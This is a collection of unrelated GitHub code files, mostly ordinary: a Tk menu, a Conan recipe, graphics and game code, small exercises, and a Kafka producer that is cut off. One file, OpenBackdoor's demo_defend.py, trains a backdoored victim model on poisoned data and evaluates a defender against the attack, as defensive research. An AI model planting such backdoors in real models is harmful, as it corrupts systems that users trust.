width=1, height=1, text=u\"\\u21E9\", command=lambda: runCommand(\"xdotool key 'Super_L+Down'\"))\n\n self.v = Scale(master, from_=0, to=100, orient=HORIZONTAL, showvalue=0, command=self.setVlm)\n\n #self.n = Scale(master, from_=0, to=19 , orient=HORIZONTAL, showvalue=0, command=self.setNcs)\n\n #self.u.grid(row=0, sticky=N)\n self.l.grid(row=0, sticky=W)\n self.r.grid(row=0, sticky=E)\n #self.d.grid(row=0, sticky=S)\n\n self.v.grid(row=1)\n\n #self.n.grid(row=2)\n\n self.v.set(75)\n #self.n.set(19)\n\n binds = (\n (\"\", self.on_accel_runBrowser),\n (\"\", self.on_accel_runTerminal),\n (\"\", self.on_accel_runFileManager),\n (\"\", self.on_accel_runEditor))\n\n for keys, envt in binds:\n self.master.bind_all(keys, envt)\n\n menubar = Menu(master)\n\n appsmenu = Menu(menubar)\n\n menubar.add_cascade(label=\"Root Menu\", menu=appsmenu)\n\n # Basic apps\n for lbl, cmmnd, k in __basic__:\n if shutil.which(cmmnd) is not None:\n appsmenu.add_command(label=lbl, accelerator=k, command=lambda param=cmmnd: runCommand(param))\n\n appsmenu.add_separator()\n\n # Internet\n netmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __net__:\n if shutil.which(cmmnd) is not None:\n netmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Dev menu\n devmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __dev__:\n if shutil.which(cmmnd) is not None:\n devmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Multimedia\n mmmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __media__:\n if shutil.which(cmmnd) is not None:\n mmmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Games menu\n gammenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __games__:\n if shutil.which(cmmnd) is not None:\n gammenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # File system tools\n toolsmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __fs__:\n if shutil.which(cmmnd) is not None:\n toolsmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Admin tools\n adminmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __admin__:\n adminmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp, 1))\n\n # Util Menu\n utilmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __utils__:\n if shutil.which(cmmnd) is not None:\n utilmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Config Menu\n configmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __config__:\n if shutil.which(cmmnd) is not None:\n configmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Help Menu\n helpmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr in __help__:\n if shutil.which(cmmnd) is not None:\n helpmenu.add_command(label=lbl, command=lambda param=cmmnd, arg=cla, hlp=hlpr: runCommand(param, arg, hlp))\n\n # Menu\n menumenu = Menu(menubar)\n menumenu.add_command(label=\"Edit Menu\", command=lambda: runCommand(__editor__ + \" \" + sys.argv[0]))\n menumenu.add_command(label=\"Refresh Menu\", command=self.runRfs)\n menumenu.add_command(label=\"Close Menu\", command=self.master.quit)\n\n # PC\n pcmenu = Menu(menubar)\n for lbl, cmmnd, cla, hlpr, adm in __pc_options__:\n pcmenu.add_command(label=lbl, command=lambda param=cmmnd, 
arg=cla, hlp=hlpr, sd=adm: runCommand(param, arg, hlp, sd))\n\n self.groups = (\n (\"Internet\", netmenu),\n (\"Development\", devmenu),\n (\"Mediums\", mmmenu),\n (\"Games\", gammenu),\n (\"File System\", toolsmenu),\n (\"Admin Tools\", adminmenu),\n (\"Utilities\", utilmenu),\n (\"Config\", configmenu),\n (\"Help\", helpmenu),\n (\"Menu\", menumenu),\n (\"PC Menu\",pcmenu))\n\n # Groups\n for lbl, mnGrp in self.groups:\n appsmenu.add_cascade(label=lbl, menu=mnGrp)\n\n appsmenu.add_separator()\n\n appsmenu.add_command(label=\"Lock Screen\", command=lambda: runCommand(\"xscreensaver-command -lock\"))\n\n self.master.config(menu=menubar)\n\n # Menu\n def runRfs(self):\n app = sys.argv[0]\n runCommand(app)\n self.master.quit()\n\n # Accelearator definitions\n def on_accel_runTerminal(self, widget):\n runCommand(__terminal__)\n def on_accel_runEditor(self, widget):\n runCommand(__editor__)\n def on_accel_runFileManager(self, widget):\n runCommand(__file_manager__)\n def on_accel_runBrowser(self, widget):\n runCommand(__browser__)\n\n # Volume\n def setVlm(self, widget):\n app = \"amixer set 'Master' \" + str(self.v.get()) + \"%\"\n runCommand(app)\n\nif __name__ == \"__main__\":\n master = Tk()\n myMenu = TkRootMenu(master)\n master.mainloop()\n","repo_name":"michaeltd/pythonRootMenu","sub_path":"TkRootMenu.py","file_name":"TkRootMenu.py","file_ext":"py","file_size_in_byte":7376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31933094305","text":"from conan import ConanFile\nfrom conan.tools.build import check_min_cppstd\nfrom conan.tools.files import chdir, copy, get, rename, rmdir\nfrom conan.tools.layout import basic_layout\nimport os\n\nrequired_conan_version = \">=1.50.0\"\n\n\nclass BlazeConan(ConanFile):\n name = \"blaze\"\n url = \"https://github.com/conan-io/conan-center-index\"\n homepage = \"https://bitbucket.org/blaze-lib/blaze\"\n description = \"open-source, high-performance C++ math library for dense and sparse arithmetic\"\n topics = (\"blaze\", \"math\", \"algebra\", \"linear algebra\", \"high-performance\")\n license = \"BSD-3-Clause\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n no_copy_source = True\n\n def package_id(self):\n self.info.clear()\n\n def validate(self):\n if self.settings.compiler.get_safe(\"cppstd\"):\n check_min_cppstd(self, 14)\n\n def layout(self):\n basic_layout(self, src_folder=\"src\")\n\n def source(self):\n base_source_dir = os.path.join(self.source_folder, os.pardir)\n get(self, **self.conan_data[\"sources\"][self.version],\n destination=base_source_dir, strip_root=True)\n with chdir(self, base_source_dir):\n rmdir(self, self.source_folder)\n rename(self, src=f\"blaze-{self.version}\", dst=self.source_folder)\n\n def build(self):\n pass\n\n def package(self):\n copy(self, \"LICENSE\", src=self.source_folder, dst=os.path.join(self.package_folder, \"licenses\"))\n copy(self, \"blaze/*.h\", src=self.source_folder, dst=os.path.join(self.package_folder, \"include\"))\n\n def package_info(self):\n self.cpp_info.set_property(\"cmake_file_name\", \"blaze\")\n self.cpp_info.set_property(\"cmake_target_name\", \"blaze::blaze\")\n self.cpp_info.bindirs = []\n self.cpp_info.frameworkdirs = []\n self.cpp_info.libdirs = []\n self.cpp_info.resdirs = 
[]\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/blaze/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"21196524093","text":"import operator\nfrom PIL import Image\n\n\nclass graphicsWindow:\n\n def __init__(self, width=640, height=480):\n self.__mode = 'RGB'\n self.__width = width\n self.__height = height\n self.__canvas = Image.new(self.__mode, (self.__width, self.__height))\n self.__image = self.__canvas.load()\n\n def drawPoint(self, point, color):\n if 0 <= point[0] < self.__width and 0 <= point[1] < self.__height:\n self.__image[point[0], point[1]] = color\n\n # returns the x value of the line point as an integer\n def getX(self, point):\n return int(point.get(0, 0))\n\n # returns the y value of the line point as an integer\n def getY(self, point):\n return int(point.get(1, 0))\n\n # This method uses bresenham's line algorithm to draw a line given two points and the line colour.\n def drawLine(self, point1, point2, color):\n # Get the x and y coords of each point passed to the draw line method\n x1 = self.getX(point1)\n x2 = self.getX(point2)\n y1 = self.getY(point1)\n y2 = self.getY(point2)\n\n # Define the rise and run of the line\n rise = y2 - y1\n run = x2 - x1\n\n # If the line is vertical, the run is 0, therefore, no m value is calculated. First determine if the line goes\n # up or down and then draw each point.\n if run == 0:\n if y2 < y1:\n y1, y2 = (y2, y1)\n for y in range(y1, y2 + 1):\n self.drawPoint((x1, y), color)\n else:\n m = float(rise) / run\n # if the slope is positive, aka the line goes up, make the adjust value positive, else negative, also set\n # the offset to 0\n adjust = 1 if m >= 0 else -1\n offset = 0\n # if the abs value of the run is larger than the rise, determine the line direction and plot each line point\n # based on the run, the offset/adjust will account will account for changes in the y-value based on the\n # line slope\n if 1 >= m >= -1:\n delta = abs(rise) * 2\n threshold = abs(run)\n thresholdInc = abs(run) * 2\n y = y1\n if x2 < x1:\n x1, x2 = (x2, x1)\n y = y2\n for x in range(x1, x2 + 1):\n self.drawPoint((x, y), color)\n offset += delta\n if offset >= threshold:\n y += adjust\n threshold += thresholdInc\n # if the abs value of the rise is larger than the run, determine the line direction and plot each line point\n # based on the rise, the offset/adjust will account will account for changes in the x-value based on the\n # line slope\n else:\n delta = abs(run) * 2\n threshold = abs(rise)\n thresholdInc = abs(rise) * 2\n x = x1\n if y2 < y1:\n y1, y2 = (y2, y1)\n x = x2\n for y in range(y1, y2 + 1):\n self.drawPoint((x, y), color)\n offset += delta\n if offset >= threshold:\n x += adjust\n threshold += thresholdInc\n\n def saveImage(self, fileName):\n self.__canvas.save(fileName)\n\n def showImage(self):\n self.__canvas.show()\n\n def getWidth(self):\n return self.__width\n\n def getHeight(self):\n return self.__height\n","repo_name":"MatteoTanziCodes/School-Western","sub_path":"Year 3/3388/assignment1/graphicsWindow.py","file_name":"graphicsWindow.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72296915129","text":"#!/usr/bin/env python3\n\nfrom numpy import pi, cos, sqrt, zeros\n\ncoefficients = zeros((8, 8))\n\n# Genereate the coefficient matrix\ncoefficients[0] = 
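sqrt(0.125)  # = 1/(2*sqrt(2)): this scale makes the DC row of the DCT-II matrix orthonormal\ncoefficients[0] = 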
sqrt(0.125)\nfor j in range(1, 8):\n\tfor i in range(8):\n\t\tcoefficients[j][i] = 0.5*cos(i*(2*j + 1)*pi/16.0)\n\n# Print out the matrix\nprint(\"{\")\nfor j in range(8):\n\tprint(\" {\", end = \" \")\n\tfor i in range(8):\n\t\tprint(\"%ff\" % coefficients[j][i], end = (\", \" if i != 7 else \"\"))\n\tprint(\"}\", end = \", \\n\" if j != 7 else \"\\n\")\nprint(\"}\")\n","repo_name":"fhtuft/jpeg","sub_path":"util/dct_table_generator.py","file_name":"dct_table_generator.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8465311038","text":"import pygame\nimport random\nfrom pygame.locals import *\nfrom prey import *\nfrom lion import *\nfrom hunter import *\n\n#reactions possible for catching prey\neat = ['Delicious!', 'Mmmm', 'Tasty', 'I\\'ve caught you!', 'You\\'ll never escape!', 'You will make a fine dinner']\n\n#when hunter touches lion\nhurt = ['Ahh!', 'That hurt!', 'You are a BAD hunter!', 'Please don\\'t hurt me!', 'Ouch!']\n\n# react = random.randint(0, len(die) - 1)\n# dieReaction = die[react]\n\n#when hunter kills lion\ndie = ['Nooooooo', 'Why?', 'I have a family!']\n\n# start score\nscorePoint = 0\n\n# start health\nhp = 20\n\npygame.init()\n\n# Clock to set framerate\nclock = pygame.time.Clock()\n\n# makes screen info\nscreen_info = pygame.display.Info()\n\n# set size of game board to screen size\nscreen_size = (width, height) = (screen_info.current_w, screen_info.current_h)\n\n# set screen to screen size\nscreen = pygame.display.set_mode(screen_size)\n\n#color of background\ncolor = (235, 204, 52)\n\n#color of background when you win\nnewColor = (66,103,149)\n\n#color of background when you die\ndieColor = (228,89,69)\n\n#tect color and background color\ntextColor=(50,254,30)\ntxtBackgroundColor=(94,0,4)\n\n#stuff for the score\nscoreColor = (184,240,161)\nscoreBackground = (7,84,152)\n\n#color of win text\nwinColor = (152,195,225)\nwinBackgroundColor = (66,103,149)\n\n#color of die text\ndeathColor = (223,245,128)\ndeathBackgroundColor = (228,89,69)\n\n#color of hurt text\nouchColor = (244,201,12)\nouchBack = (140,219,246)\n\n#stuff for hp\nhpColor = (184,240,161)\nhpBackgroundColor = (7,84,152)\n\nplayer = Lion((150,180))\n\n# loading the prey image\nprey_image = pygame.image.load(\"prey.jpg\")\nprey_image = pygame.transform.smoothscale(prey_image, (100, 100))\n\nprey_rect = prey_image.get_rect()\n\n# places image\nprey_rect.center = (width//2, height//2)\n\n#variables to move prey\nspeed = pygame.math.Vector2(10, 6)\nrotation = random.randint(0, 360)\nspeed.rotate_ip(rotation)\n\npygame.transform.rotate(prey_image, 180 - rotation)\n\n#The reason it is used insetad of the array is because\n#it uses a sprite, which has built in stuff that is needed\n#for collision code\n\n#prey created\npreys = pygame.sprite.Group() \n\n#hunters created\nhunters = pygame.sprite.Group()\n\n#moves the prey\ndef move_prey():\n global prey_image\n screen_info = pygame.display.Info()\n prey_rect.move_ip(speed)\n\n # IF PREY HITS TOP OR BOTTOM\n if prey_rect.top < 0 or prey_rect.bottom > screen_info.current_h:\n #go the opposite direction\n speed[1] *= -1\n prey_rect.move_ip(0, speed[1])\n #updates it\n prey_image = pygame.transform.flip(prey_image, True, False)\n\n # IF PREY HITS LEFT OR RIGHT\n if prey_rect.left < 0 or prey_rect.right > screen_info.current_w:\n #go the opposite direction\n speed[0] *= -1\n prey_rect.move_ip(speed[0], 0)\n #updates it\n prey_image = 
pygame.transform.flip(prey_image, False, True)\n\n\n# game code\ndef main():\n    #while True == will always run\n    while True:\n        \n        clock.tick(60)\n        global scorePoint\n        global scoreAPoint\n        global hp\n        global myHp\n        myHp = (\"Health is: \" + str(hp))\n        scoreAPoint = (\"Score is: \" + str(scorePoint))\n\n        for event in pygame.event.get():\n            if event.type == QUIT:  # QUIT constant from pygame.locals, not the built-in quit()\n                pygame.quit()\n                raise SystemExit  # sys is never imported, so exit via the exception\n            if event.type == MOUSEBUTTONDOWN:\n                # determines if hunter spawns\n                num = random.randint(0, 1234)\n                if num % 2 == 0:\n                    hunters.add(Hunter(event.pos))\n                else:\n                    #adds prey\n                    preys.add(Prey(event.pos))\n            \n            if event.type == KEYUP:\n                if event.key == K_UP:\n                    player.speed[1]=0 \n                if event.key == K_DOWN:\n                    player.speed[1]=0 \n                if event.key==K_LEFT:\n                    player.speed[0]=0\n                if event.key==K_RIGHT:\n                    player.speed[0]=0\n            if event.type == KEYDOWN:\n                if event.key == K_UP:\n                    player.speed[1]=-15\n                if event.key == K_DOWN:\n                    player.speed[1]=15 \n                if event.key==K_LEFT:\n                    player.speed[0]=-15\n                if event.key==K_RIGHT:\n                    player.speed[0]=15\n\n        move_prey()\n        #makes background color\n        screen.fill(color)\n        screen.blit(prey_image, prey_rect)\n\n        for prey in preys:\n            prey.update()\n        for prey in preys:\n            prey.draw(screen)\n\n        for hunter in hunters:\n            hunter.update()\n        for hunter in hunters:\n            hunter.draw(screen)\n\n        screen.blit(player.image,player.rect)\n        player.update()\n\n        hit_hunter = pygame.sprite.spritecollide(player,hunters,True)\n        screen.blit(player.image,player.rect)\n        if hit_hunter:\n            #picks a reaction\n            getHurt = random.randint(0, len(hurt) -1)\n            hurtReaction = hurt[getHurt]\n\n            font = pygame.font.Font('freesansbold.ttf', 32) \n            ouch = font.render(hurtReaction, True, ouchColor, ouchBack)\n            ouchRect = ouch.get_rect() \n            ouchRect.center = (width // 2, 550)\n            screen.blit(ouch,ouchRect)\n\n            hp = hp -1\n\n        get_hit=pygame.sprite.spritecollide(player,preys,True)\n        screen.blit(player.image,player.rect)\n        if get_hit:\n            # picks a reaction\n            num = random.randint(0, len(eat) - 1)\n            devour = eat[num]\n\n            #stuff for font\n            font = pygame.font.Font('freesansbold.ttf', 32) \n            text = font.render(devour, True, textColor, txtBackgroundColor)\n            textRect = text.get_rect() \n            textRect.center = (width // 2, 550)\n            screen.blit(text,textRect)\n\n            # add a point to the score each time\n            scorePoint += 1\n        \n        #same as text\n        scoreFont = pygame.font.Font('freesansbold.ttf', 32) \n        score = scoreFont.render(scoreAPoint, True, scoreColor, scoreBackground)\n        scoreRect = score.get_rect() \n        scoreRect.topleft = (50, 90)\n        screen.blit(score,scoreRect)\n\n        hpFont = pygame.font.Font('freesansbold.ttf', 32) \n        theHp = hpFont.render(myHp, True, hpColor, hpBackgroundColor)\n        hpRect = theHp.get_rect() \n        hpRect.topleft = (50, 50)\n        screen.blit(theHp,hpRect)\n\n        if scorePoint >= 30:\n            screen.fill(newColor)\n\n            winFont = pygame.font.Font('Modak-Devanagari.ttf', 100) \n            win = winFont.render(\"You won!!!\", True, winColor, winBackgroundColor)\n            winRect = win.get_rect() \n            winRect.center = (width // 2, height //2)\n            screen.blit(win,winRect)\n        \n        if hp <= 0:\n            screen.fill(dieColor)\n\n            dieFont = pygame.font.Font('Modak-Devanagari.ttf', 100) \n            death = dieFont.render(\"nooooo\", True, deathColor, deathBackgroundColor)\n            dieRect = death.get_rect() \n            dieRect.center = (width // 2, height //2)\n            screen.blit(death,dieRect)\n        \n\n        # update the display\n        pygame.display.flip()\n\n\n#game loop\nif __name__ == '__main__':\n    main() ","repo_name":"chickenLemonade/SavannaHunt","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"29353287469","text":"n1 = float(input(\"number 1: \"))\nn2 = float(input(\"number 2: \"))\nn3 = float(input(\"number 3: \"))\nif (n1 <= n2 and n1 <= n3):\n    primero = n1\n    if (n2 < n3):\n        segundo = n2\n        tercero = n3\n    else:\n        segundo = n3\n        tercero = n2\nelse:\n    if (n2 <= n1 and n2 <= n3):\n        primero = n2\n        if n1 < n3:\n            segundo= n1\n            tercero= n3\n        else:\n            segundo= n3\n            tercero= n1\n    else:\n        if (n3 <= n2 and n3 <= n1):\n            primero= n3\n            if n2 < n1:\n                segundo= n2\n                tercero= n1\n            else:\n                segundo= n1\n                tercero= n2\nprint(\"{},{},{}\".format(primero,segundo,tercero))\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej6/hito1_ej6_980a07121860431860aa7d3179da7a85.py","file_name":"hito1_ej6_980a07121860431860aa7d3179da7a85.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"23564770612","text":"# Defend\nimport os\nimport json\nimport argparse\nimport openbackdoor as ob \nfrom openbackdoor.data import load_dataset, get_dataloader, wrap_dataset\nfrom openbackdoor.victims import load_victim\nfrom openbackdoor.attackers import load_attacker\nfrom openbackdoor.defenders import load_defender\nfrom openbackdoor.utils import set_config, logger, set_seed\nfrom openbackdoor.utils.visualize import display_results\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--config_path', type=str, default='./configs/base_config.json')\n    parser.add_argument('--seed', type=int, default=42)\n    args = parser.parse_args()\n    return args\n\ndef main(config):\n    # choose a victim classification model \n    victim = load_victim(config[\"victim\"])\n    # choose attacker and initialize it with default parameters \n    attacker = load_attacker(config[\"attacker\"])\n    defender = load_defender(config[\"defender\"])\n    # choose target and poison dataset\n    target_dataset = load_dataset(**config[\"target_dataset\"]) \n    poison_dataset = load_dataset(**config[\"poison_dataset\"]) \n    # target_dataset = attacker.poison(victim, target_dataset)\n    # launch attacks \n    logger.info(\"Train backdoored model on {}\".format(config[\"poison_dataset\"][\"name\"]))\n    backdoored_model = attacker.attack(victim, poison_dataset, config, defender)\n    logger.info(\"Evaluate backdoored model on {}\".format(config[\"target_dataset\"][\"name\"]))\n    results = attacker.eval(backdoored_model, target_dataset, defender)\n    \n    display_results(config, results)\n    \n    # Fine-tune on clean dataset\n    '''\n    print(\"Fine-tune model on {}\".format(config[\"target_dataset\"][\"name\"]))\n    CleanTrainer = ob.BaseTrainer(config[\"train\"])\n    backdoored_model = CleanTrainer.train(backdoored_model, wrap_dataset(target_dataset, config[\"train\"][\"batch_size\"]))\n    '''\n\nif __name__=='__main__':\n    args = parse_args()\n    with open(args.config_path, 'r') as f:\n        config = json.load(f)\n    \n    config = set_config(config)\n    set_seed(args.seed)\n\n    main(config)\n","repo_name":"thunlp/OpenBackdoor","sub_path":"demo_defend.py","file_name":"demo_defend.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"77"}
{"seq_id":"74723888247","text":"def collect_stuff(*args):\n    # The parameter type is a tuple\n    print(type(args))\n    print(args)\n    print(sum(args))\n\n\n\ncollect_stuff(1,3, 5)\n\ndef my_max(*numbers):\n    greatest = numbers[0]\n    for number in numbers:\n        if (number > greatest):\n            greatest = number\n\n    return greatest\n\n\nprint(my_max(1, 4, 10, 5, 14, -7))","repo_name":"Benneee/Take-Python-Serious","sub_path":"15-Tuples/variable-number-of-function-arguments-with-*args.py","file_name":"variable-number-of-function-arguments-with-*args.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"}
{"seq_id":"4515220882","text":"import numpy\nimport pandas\nfrom grplot.features.optimizer.optimizer_key import optimizer_key\n\n\ndef optimizer_analytic(df, variables, mode):\n    # key\n    key = numpy.array([])\n    if type(variables) == list:\n        key = numpy.concatenate([key, optimizer_key(var_list=variables)])\n    elif type(variables) == numpy.ndarray:\n        key = numpy.concatenate([key, variables])\n    else:\n        raise Exception('Unsupported variables type!')\n    # key length check\n    if len(key) > 0:\n        # filter data\n        if type(df) == dict:\n            df_ = {}\n            for k in numpy.unique(key):\n                if k in df.keys():\n                    if type(df[k]) == list:\n                        if mode in ['numpy','saver']:\n                            df_[k] = numpy.array(df[k])\n                        elif mode in ['pandas','perf']:\n                            df_ = pandas.DataFrame.from_dict({k: df[k] for k in numpy.unique(key) if k in df.keys()})\n                            break\n                        else:\n                            raise Exception('Unknown optimizer argument!')\n                    elif type(df[k]) == numpy.ndarray:\n                        if mode in ['numpy','saver']:\n                            df_[k] = df[k]\n                        elif mode in ['pandas','perf']:\n                            df_ = pandas.DataFrame.from_dict({k: df[k] for k in numpy.unique(key) if k in df.keys()})\n                            break\n                        else:\n                            raise Exception('Unknown optimizer argument!')\n                    else:\n                        raise Exception('Unsupported dictionary sub data structure!')\n                else:\n                    pass\n        elif type(df) == pandas.core.frame.DataFrame:\n            if mode in ['numpy','saver']:\n                df_ = {k: df[[k]].to_records()[k] for k in numpy.unique(key) if k in df}\n            elif mode in ['pandas','perf']:\n                df_ = df[[k for k in numpy.unique(key) if k in df]]\n                # if there is only one column\n                if type(df_) == pandas.core.series.Series:\n                    df_ = pandas.DataFrame(df_)\n                else:\n                    pass\n            else:\n                raise Exception('Unknown optimizer argument!')\n        else:\n            raise Exception('Unsupported data structure!')\n    else:\n        raise Exception('Wrong data type of axis!')\n    return df_","repo_name":"ghiffaryr/grplot","sub_path":"grplot/features/optimizer/optimizer_analytic.py","file_name":"optimizer_analytic.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"}
{"seq_id":"7967195615","text":"import time\nimport datetime\nimport logging\nimport keys\n\n# ----------------------------------------------------------------------------------------------------------\n# General\n# ----------------------------------------------------------------------------------------------------------\n\n# set up logging\nlogging.basicConfig(filename='comparison.log', level=logging.INFO)\n\n\n# ----------------------------------------------------------------------------------------------------------\n# Functions\n# ----------------------------------------------------------------------------------------------------------\n\ndef compare(upper_bauschein, lower_bauschein, tank, leitung):\n    \"\"\"compares the code numbers\"\"\"\n\n    # timestamp\n    ts = time.time()\n    st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')\n\n    # comparison\n    if upper_bauschein == tank and lower_bauschein == leitung:\n        print('Check successful')\n        logging.info(st + \" - Comparison successful - \" + upper_bauschein + lower_bauschein + tank + leitung)\n        return 1\n    elif upper_bauschein == tank and lower_bauschein != leitung:\n        print('Check failed: the tank code number on the build sheet does not match the corresponding '\n              'DMC code!')\n        logging.info(st + \" - Comparison failed - \" + upper_bauschein + lower_bauschein + tank + leitung)\n        return 2\n    elif upper_bauschein != tank and lower_bauschein == leitung:\n        print('Check failed: the line code number on the build sheet does not match the corresponding '\n              'DMC code!')\n        logging.info(st + \" - Comparison failed - \" + upper_bauschein + lower_bauschein + tank + leitung)\n        return 3\n    else:\n        print('Check failed: neither the line nor the tank code number on the build sheet matches the '\n              'corresponding DMC code!')\n        logging.info(st + \" - Comparison failed - \" + upper_bauschein + lower_bauschein + tank + leitung)\n        return 4\n\n\ndef start_comparison(upper_bauschein, lower_bauschein, tank, leitung):\n    \"\"\"validates the code numbers and starts the comparison\"\"\"\n\n    # load the key lists from the 'keys' module\n    tank_list = keys.get_tank_keys()\n    leitung_list = keys.get_leitung_keys()\n\n    # check whether the code numbers are registered\n    upper_bauschein_check = check(upper_bauschein, tank_list)\n    lower_bauschein_check = check(lower_bauschein, leitung_list)\n    tank_check = check(tank, tank_list)\n    leitung_check = check(leitung, leitung_list)\n\n    # compare only if all checks succeeded\n    if upper_bauschein_check and lower_bauschein_check and tank_check and leitung_check:\n        return compare(upper_bauschein, lower_bauschein, tank, leitung)\n    else:\n        print(\"Please check your input.\")\n        logging.info(\"Invalid code number - \" + upper_bauschein + lower_bauschein + tank + leitung)\n        return 5\n\n\ndef check(key, key_list):\n    \"\"\"checks whether a code number is registered\"\"\"\n    # convert numeric formats into a string\n    if isinstance(key, int) or isinstance(key, float):\n        key = str(key)\n    # remove all whitespace and commas\n    if isinstance(key, str):\n        key = key.replace(\" \", \"\")\n        key = key.replace(\",\", \"\")\n    # make sure the string is not empty\n    if isinstance(key, str) and not len(key) == 0:\n        for i in key_list:\n            if key in i[len(i)-1]:\n                return True\n    return False\n","repo_name":"informatik-heilbronn/provapi","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":3565,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"21645399083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 16 20:30:39 2017\r\n\r\n@author: Aluno\r\n\"\"\"\r\n\r\nimport numpy as np \r\nimport cv2 \r\n\r\nimg = cv2.imread('messi5.jpg', 0)\r\ncv2.imshow('image', img)\r\nk = cv2.waitKey(0)  # & 0xFF\r\nif k == 27:  # wait for the ESC key to exit\r\n    cv2.destroyAllWindows()\r\nelif k == ord('s'):  # wait for the 's' key to save and exit\r\n    cv2.imwrite('messigray.png', img)\r\n    cv2.
destroyAllWindows ()","repo_name":"roneybraz/OPENCV","sub_path":"teste02.py","file_name":"teste02.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26182907214","text":"# -*- coding: utf-8 -*-\n\nimport confluent_kafka\nimport time\nimport logging as log\n\nfrom colorama import Fore\n\nfrom confluent_kafka.cimpl import Message\nfrom confluent_kafka.cimpl import KafkaException\n\n\nclass Producer(object):\n def __init__(self,\n conf: dict,\n produce_fail_retry_count,\n produce_fail_retry_wait_time,\n callback=None):\n self.produce_fail_retry_count = produce_fail_retry_count\n self.produce_fail_retry_wait_time = produce_fail_retry_wait_time\n\n self.pd = confluent_kafka.Producer(conf)\n self.callback = callback\n\n def produces(self, topic, values: list, key=None):\n for value in values:\n retry_count = 0\n while True:\n try:\n self.pd.produce(topic,\n value,\n key=key,\n callback=self.delivery_callback)\n break\n except BufferError as e:\n log.warning(Fore.LIGHTRED_EX + 'Producer queue is full: {} messages awaiting delivery - try again'\n .format(len(self.pd)) + Fore.RESET)\n\n time.sleep(1)\n except KafkaException as e:\n log.error(Fore.RED + 'KafkaException: - {}\\n{}\\n'.format(key, e) + Fore.RESET)\n\n if retry_count >= self.produce_fail_retry_count:\n log.warning(Fore.LIGHTRED_EX + 'key: {} - skip'.format(key) + Fore.RESET)\n break\n\n time.sleep(self.produce_fail_retry_wait_time)\n retry_count += 1\n\n # Serve delivery callback queue.\n # NOTE: Since produce() is an asynchronous API this poll() call\n # will most likely not serve the delivery callback for the\n # last produce()d message.\n self.pd.poll(0)\n\n # Wait until all messages have been delivered\n # log.debug('Waiting for: {} deliveries'.format(len(self.pd)))\n self.pd.flush()\n\n def produce(self, topic, value, key=None, headers={}):\n retry_count = 0\n while True:\n try:\n self.pd.produce(topic,\n value,\n key=key,\n headers=headers,\n callback=self.delivery_callback)\n break\n except BufferError as e:\n log.warning(Fore.LIGHTRED_EX +\n 'Producer queue is full: {} messages awaiting delivery - try again'.format(len(self.pd)) +\n Fore.RESET)\n\n time.sleep(1)\n except KafkaException as e:\n log.error(Fore.RED + 'KafkaException: - {}\\n{}\\n'.format(key, e) + Fore.RESET)\n retry_count += 1\n if self.produce_fail_retry_count < retry_count:\n log.warning(Fore.LIGHTRED_EX + 'key: {} - skip'.format(key) + Fore.RESET)\n break\n time.sleep(self.produce_fail_retry_wait_time)\n\n self.pd.flush()\n\n def poll(self):\n self.pd.poll(0)\n\n def flush(self):\n self.pd.flush()\n\n def awaiting_count(self):\n return len(self.pd)\n\n def delivery_callback(self, err, msg: Message):\n msg_dict = {'topic': msg.topic(),\n 'partition': msg.partition(),\n 